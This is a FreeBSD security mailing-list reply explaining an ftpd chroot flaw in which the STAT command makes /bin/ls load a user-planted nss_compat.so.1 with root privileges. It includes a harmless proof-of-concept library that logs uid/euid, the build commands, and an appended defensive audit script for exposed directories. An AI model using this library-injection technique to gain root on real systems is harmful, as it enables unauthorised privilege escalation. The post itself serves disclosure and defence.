Re: ftpd security issue ?
> Saw this on FD... Anyone know any more details about this ?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html
This is a well-known hazard of chrooting to directories controlled by
unprivileged users. In this case, the vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when the STAT command is issued, and nss_compat.so is
loaded by libc regardless of the elevated privileges.
This can be proven by creating a dummy ~/lib/nss_compat.so.1:
[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>   /* getuid(), geteuid() */
/* Runs when the library is loaded; records the real and effective uid. */
void _init() {
FILE *fp = fopen("asdf", "w+");
if (fp) {
fprintf(fp, "%d %d\n", getuid(), geteuid());
fclose(fp);
}
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1
And after calling STAT command:
[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000
BTW, this vulnerability affects only configurations where /etc/ftpchroot exists
or the anonymous user is allowed to create files inside the etc and lib dirs.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
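An added audit helper (not code from the post above or from FreeBSD) for checking the configurations the post names as exposed: for a directory ftpd may chroot into, it reports lib/ and etc/ subdirectories not owned by root and any shared object under lib/, which is where a chrooted /bin/ls would pick up nss_compat.so.1. The function name and output format are my own.

```shell
#!/bin/sh
# Added defender-side audit, not part of the original post. For each directory
# that ftpd may chroot into (home of a user listed in /etc/ftpchroot, or the
# anonymous ftp root), report lib/ and etc/ subdirectories that are not owned
# by root and every shared object found under lib/.
# Usage: audit_chroot_home /home/ftp ; exit status is 1 when anything was found.
audit_chroot_home() {
    home=$1
    hits=0
    for sub in lib etc; do
        dir="$home/$sub"
        [ -d "$dir" ] || continue
        # lib/ or etc/ inside the chroot but not owned by root: the user can
        # populate it with whatever a privileged process later loads.
        if [ -n "$(find "$dir" -prune ! -user root -print)" ]; then
            echo "user-owned $sub directory: $dir"
            hits=$((hits + 1))
        fi
    done
    if [ -d "$home/lib" ]; then
        # Any .so under lib/ is suspect; nothing legitimate belongs there in
        # a user's home.
        sos=$(find "$home/lib" -type f -name '*.so*' -print)
        if [ -n "$sos" ]; then
            printf '%s\n' "$sos" | sed 's/^/shared object inside chroot: /'
            hits=$((hits + $(printf '%s\n' "$sos" | wc -l)))
        fi
    fi
    [ "$hits" -eq 0 ]
}
```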